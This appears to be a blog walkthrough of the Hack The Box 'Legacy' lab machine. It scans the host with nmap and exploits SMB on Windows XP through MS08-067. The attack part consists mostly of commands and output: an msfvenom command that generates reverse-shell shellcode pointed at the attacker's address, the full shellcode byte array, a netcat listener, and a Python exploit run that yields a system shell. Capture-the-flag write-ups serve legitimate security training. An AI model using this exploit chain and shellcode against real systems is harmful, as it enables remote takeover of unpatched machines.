hackthebox legacy walkthrough

Starting with nmap

# nmap -sC -sV 10.10.10.4 -oA htb/legacy/legacy
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 21:31 EDT
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m13s, deviation: 2h07m16s, median: 4d22h57m13s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:51:c6 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-07-21T06:29:07+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 272.05 seconds

smb port 445 is open and the machine is XP….legacy

Searching on the internet, xp is affected by ms08-067, CVE-2008-4250

Further python exploit is available for this. We can download it from here.

First of all we need to change the shellcode in the script. For this we are going to generate our own shellcode.

We will listen on port 62000 for shell.

# nc -lvnp 62000

then lets run following

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.44 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
-- snip --
unsigned char buf[] = 
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x99\xdb\xf4\xbb\x83\xee\xfc\xe2\xf4\x65\x33\x76\xbb\x99\xdb"
"\x94\x32\x7c\xea\x34\xdf\x12\x8b\xc4\x30\xcb\xd7\x7f\xe9\x8d"
"\x50\x86\x93\x96\x6c\xbe\x9d\xa8\x24\x58\x87\xf8\xa7\xf6\x97"
"\xb9\x1a\x3b\xb6\x98\x1c\x16\x49\xcb\x8c\x7f\xe9\x89\x50\xbe"
"\x87\x12\x97\xe5\xc3\x7a\x93\xf5\x6a\xc8\x50\xad\x9b\x98\x08"
"\x7f\xf2\x81\x38\xce\xf2\x12\xef\x7f\xba\x4f\xea\x0b\x17\x58"
"\x14\xf9\xba\x5e\xe3\x14\xce\x6f\xd8\x89\x43\xa2\xa6\xd0\xce"
"\x7d\x83\x7f\xe3\xbd\xda\x27\xdd\x12\xd7\xbf\x30\xc1\xc7\xf5"
"\x68\x12\xdf\x7f\xba\x49\x52\xb0\x9f\xbd\x80\xaf\xda\xc0\x81"
"\xa5\x44\x79\x84\xab\xe1\x12\xc9\x1f\x36\xc4\xb3\xc7\x89\x99"
"\xdb\x9c\xcc\xea\xe9\xab\xef\xf1\x97\x83\x9d\x9e\x24\x21\x03"
"\x09\xda\xf4\xbb\xb0\x1f\xa0\xeb\xf1\xf2\x74\xd0\x99\x24\x21"
"\xeb\xc9\x8b\xa4\xfb\xc9\x9b\xa4\xd3\x73\xd4\x2b\x5b\x66\x0e"
"\x63\xd1\x9c\xb3\xfe\xb1\x97\xf7\x9c\xb9\x99\x29\xc4\x32\x7f"
"\xb1\xe4\xed\xce\xb3\x6d\x1e\xed\xba\x0b\x6e\x1c\x1b\x80\xb7"
"\x66\x95\xfc\xce\x75\xb3\x04\x0e\x3b\x8d\x0b\x6e\xf1\xb8\x99"
"\xdf\x99\x52\x17\xec\xce\x8c\xc5\x4d\xf3\xc9\xad\xed\x7b\x26"
"\x92\x7c\xdd\xff\xc8\xba\x98\x56\xb0\x9f\x89\x1d\xf4\xff\xcd"
"\x8b\xa2\xed\xcf\x9d\xa2\xf5\xcf\x8d\xa7\xed\xf1\xa2\x38\x84"
"\x1f\x24\x21\x32\x79\x95\xa2\xfd\x66\xeb\x9c\xb3\x1e\xc6\x94"
"\x44\x4c\x60\x14\xa6\xb3\xd1\x9c\x1d\x0c\x66\x69\x44\x4c\xe7"
"\xf2\xc7\x93\x5b\x0f\x5b\xec\xde\x4f\xfc\x8a\xa9\x9b\xd1\x99"
"\x88\x0b\x6e";

Replace shellcode in the script with above. Make sure to remove ‘;’

Then run the python script

# python ms08-067.py  10.10.10.4 6 445
-- snip --
Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

We will get the shell

# nc -lvnp 62000
listening on [any] 62000 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.4] 1031
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Leave a Reply

Your email address will not be published. Required fields are marked *